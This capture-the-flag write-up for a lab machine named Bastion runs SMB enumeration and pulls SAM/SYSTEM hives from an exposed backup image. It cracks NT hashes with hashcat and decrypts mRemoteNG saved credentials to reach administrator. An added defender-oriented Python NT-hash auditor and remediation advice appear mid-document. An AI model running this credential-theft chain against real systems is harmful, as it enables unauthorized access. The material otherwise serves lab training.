Service overview

$ nmapAutomator.sh -H 10.10.10.134 -t Full

PORT    STATE SERVICE      VERSION
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
| ssh-hostkey:
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
135/tcp open  msrpc        Microsoft Windows RPC
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -35m57s, deviation: 1h09m14s, median: 4m00s
| smb-os-discovery:
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Bastion
|   NetBIOS computer name: BASTION\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-05-28T10:13:22+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2021-05-28T08:13:18
|_  start_date: 2021-05-28T07:57:50

$ smbclient -L //10.10.10.134 -U guest
Enter WORKGROUP\guest's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        Backups         Disk
        C$              Disk      Default share
        IPC$            IPC       Remote IPC

$ smbclient //10.10.10.134/Backups
> RECURSE ON
> PROMPT OFF
> mget *

Virtual machine

VHD files in WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351 => unpack 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd with 7-Zip on Windows.
Pull SAM and SYSTEM out of C:\windows\system32\config.

$ samdump2 SYSTEM SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

Brute force

$ nano hash.txt:
26112010952d963c8dc4217daec986d9
$ hashcat -m 1000 hash.txt /usr/share/wordlists/rockyou.txt
26112010952d963c8dc4217daec986d9:bureaulampje

=> L4mpje:bureaulampje
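Why the SAM and SYSTEM hives pulled from the backup share are as good as the passwords themselves: NT hashes are unsalted MD4 over the UTF-16LE password, so anyone holding the hive can test candidates offline at full speed, which is exactly what `hashcat -m 1000` did above. The script below is an added example, not part of the original writeup: it re-implements that check in pure Python (MD4 is written out because OpenSSL 3 builds of `hashlib` often no longer expose it) and audits a pwdump-style listing like the samdump2 output above for disabled accounts, legacy LM hashes, empty passwords and passwords found in a small candidate list. The sample dump is the three lines from the samdump2 output; the candidate list and the function names are constructed for this example.

```python
"""Audit a pwdump-style SAM listing for weak or empty passwords (added example)."""
import struct
from dataclasses import dataclass

MASK = 0xFFFFFFFF
# LM hash of an empty / unstored LM password (LM storage disabled, the normal case).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4: little-endian words, 64-byte blocks, three 16-step rounds."""
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    R2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]
    R3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        # Each step updates one register, then the registers rotate (a,b,c,d) -> (d,a,b,c).
        for i in range(16):
            a = _rotl((a + F(b, c, d) + X[i]) & MASK, (3, 7, 11, 19)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + G(b, c, d) + X[R2[i]] + 0x5A827999) & MASK, (3, 5, 9, 13)[i % 4])
            a, b, c, d = d, a, b, c
        for i in range(16):
            a = _rotl((a + H(b, c, d) + X[R3[i]] + 0x6ED9EBA1) & MASK, (3, 9, 11, 15)[i % 4])
            a, b, c, d = d, a, b, c
        A, B, C, D = (A + a) & MASK, (B + b) & MASK, (C + c) & MASK, (D + d) & MASK
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> str:
    """Windows NT hash: MD4 over the UTF-16LE encoding, no salt, no iteration."""
    return md4(password.encode("utf-16le")).hex()


EMPTY_NT = nt_hash("")  # 31d6cfe0d16ae931b73c59d7e0c089c0


@dataclass
class SamEntry:
    user: str
    rid: int
    lm: str
    nt: str
    disabled: bool


def parse_pwdump(text: str):
    """Parse 'user:rid:lmhash:nthash:::' lines, honouring samdump2's '*disabled*' prefix."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        disabled = line.startswith("*disabled*")
        if disabled:
            line = line[len("*disabled*"):].strip()
        user, rid, lm, nt = line.split(":")[:4]
        entries.append(SamEntry(user, int(rid), lm.lower(), nt.lower(), disabled))
    return entries


def audit_sam(text: str, candidates):
    """Return {user: [findings]}; findings are defender-facing labels, not the secret."""
    # One hash per candidate covers every account: unsalted hashes are what make this cheap.
    table = {nt_hash(p): p for p in candidates}
    report = {}
    for e in parse_pwdump(text):
        findings = []
        if e.disabled:
            findings.append("disabled")
        if e.lm != EMPTY_LM:
            findings.append("LM hash stored (legacy, trivially crackable)")
        if e.nt == EMPTY_NT:
            findings.append("empty password")
        elif e.nt in table:
            findings.append(f"password in candidate list ({len(table[e.nt])} chars)")
        report[e.user] = findings
    return report


# Sample input: the samdump2 output from the writeup above.
SAMPLE_DUMP = """
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
"""
# Constructed candidate list standing in for rockyou.txt.
CANDIDATES = ["password", "Welcome1", "bureaulampje"]

if __name__ == "__main__":
    for user, findings in audit_sam(SAMPLE_DUMP, CANDIDATES).items():
        print(f"{user}: {', '.join(findings) or 'no findings'}")
```

The takeaway for the defender is that a backup share readable by the guest account leaks every local password hash, and because the NT hash has no salt and no work factor, cracking cost is one MD4 per candidate for all accounts at once; the remediation is to restrict the Backups share and treat image backups as containing credentials.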

User flag

l4mpje@BASTION C:\Users\L4mpje\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::d5d1:9ea8:318b:443d
   Link-local IPv6 Address . . . . . : fe80::d5d1:9ea8:318b:443d%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.134
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
9bfe57d5c3309db3a151772f9d86c6cd

Privilege escalation

Try to pull credentials out of mRemoteNG version 1.76.11.40527.

> dir "C:\Program Files (x86)\mRemoteNG"
> type C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml

Install mRemoteNG on a Windows VM and import the confCons.xml file.
Then follow the guide at http://dynamic-datacenter.be/?p=168.
=> Administrator:thXLHM96BeKL0ER2

$ ssh administrator@10.10.10.134
thXLHM96BeKL0ER2

Root flag

administrator@BASTION C:\Users\Administrator\Desktop>ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
   Connection-specific DNS Suffix  . :
   IPv6 Address. . . . . . . . . . . : dead:beef::d5d1:9ea8:318b:443d
   Link-local IPv6 Address . . . . . : fe80::d5d1:9ea8:318b:443d%4
   IPv4 Address. . . . . . . . . . . : 10.10.10.134
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:1a7c%4
                                       10.10.10.2
Tunnel adapter isatap.{8253841C-588D-4E94-B23A-993BB2E4B4D9}:
   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . :
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
958850b91811676ed6620a9c430e65c8